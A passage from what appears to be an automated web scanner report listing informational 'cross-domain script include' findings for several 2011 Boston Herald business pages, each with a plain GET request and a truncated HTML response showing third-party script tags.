Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.599. http://www.bostonherald.com/business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.600. http://www.bostonherald.com/business/general/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.601. http://www.bostonherald.com/business/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/view.bg?articleid=1312531&srvc=home&position=rated HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.602. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.603. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.604. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.605. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.606. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains (hosts taken from the script tags in the captured response body below; the capture is truncated, so the list may be incomplete):
ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com, edge.quantserve.com

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

